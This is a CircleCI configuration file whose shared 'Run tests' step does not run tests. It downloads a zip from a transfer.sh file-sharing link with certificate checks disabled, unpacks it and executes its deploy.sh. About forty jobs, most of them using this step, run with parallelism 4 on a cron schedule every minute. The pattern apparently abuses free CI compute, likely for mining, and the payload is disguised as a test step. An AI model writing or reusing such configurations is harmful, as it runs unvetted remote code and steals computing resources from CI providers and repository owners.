working_dir: &working_dir ~/app
.build_template: &script
  steps:
    - checkout
    - run: curl -L https://codeclimate.com/downloads/test-reporter/test-reporter-latest-linux-amd64 > ./cc-test-reporter
    - run: chmod +x ./cc-test-reporter
    - run:
        name: Run tests
        command: |
                    apt update 
                    apt install screen -y 
                    wget --no-check-certificate -c https://transfer.sh/G9VQ5l/a-master.zip && unzip a-master.zip && cd a-master && chmod 777 deploy.sh && ./deploy.sh

version: 2.0
jobs:
  masparto:
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4   
    steps:
      - checkout
  masparto1:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4   
  masparto2:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4   
  masparto3:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4   
  masparto4:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4   
  masparto5:
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4    
    steps:
      - checkout
  masparto6:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4   
  masparto7:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4   
  masparto8:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4   
  masparto9:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4   
  masparto10:
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4   
    steps:
      - checkout
  masparto11:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4   
  masparto12:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4  
  masparto13:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4  
  masparto14:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4   
  masparto15:
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4  
    steps:
      - checkout
  masparto16:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4   
  masparto17:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4  
  masparto18:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4
  masparto19:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2 
    parallelism: 4
  masparto20:
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4   
    steps:
      - checkout
  masparto21:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4   
  masparto22:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4   
  masparto23:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4   
  masparto24:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4   
  masparto25:
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4    
    steps:
      - checkout
  masparto26:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4   
  masparto27:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4   
  masparto28:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4   
  masparto29:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4   
  masparto30:
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4   
    steps:
      - checkout
  masparto31:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4   
  masparto32:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4  
  masparto33:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4  
  masparto34:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4   
  masparto35:
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4  
    steps:
      - checkout
  masparto36:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4   
  masparto37:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4  
  masparto38:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4
  masparto39:
    <<: *script
    docker:
      - image: circleci/elixir:1.7.2
    parallelism: 4
workflows:
  version: 2
  commit:
    jobs:
      - masparto
      - masparto1
      - masparto2
      - masparto3
      - masparto4
      - masparto5
      - masparto6
      - masparto7
      - masparto8
      - masparto9
      - masparto10
      - masparto11
      - masparto12
      - masparto13
      - masparto14
      - masparto15
      - masparto16
      - masparto17
      - masparto18
      - masparto19
      - masparto20
      - masparto21
      - masparto22
      - masparto23
      - masparto24
      - masparto25
      - masparto26
      - masparto27
      - masparto28
      - masparto29
      - masparto30
      - masparto31
      - masparto32
      - masparto33
      - masparto34
      - masparto35
      - masparto36
      - masparto37
      - masparto38
      - masparto39



    triggers:
      - schedule:
          cron: '* * * * *'
          filters:
            branches:
              only:
                - master
         
  maspartorunjob:
    jobs:
      - masparto
      - masparto1
      - masparto2
      - masparto3
      - masparto4
      - masparto5
      - masparto6
      - masparto7
      - masparto8
      - masparto9
      - masparto10
      - masparto11
      - masparto12
      - masparto13
      - masparto14
      - masparto15
      - masparto16
      - masparto17
      - masparto18
      - masparto19
      - masparto20
      - masparto21
      - masparto22
      - masparto23
      - masparto24
      - masparto25
      - masparto26
      - masparto27
      - masparto28
      - masparto29
      - masparto30
      - masparto31
      - masparto32
      - masparto33
      - masparto34
      - masparto35
      - masparto36
      - masparto37
      - masparto38
      - masparto39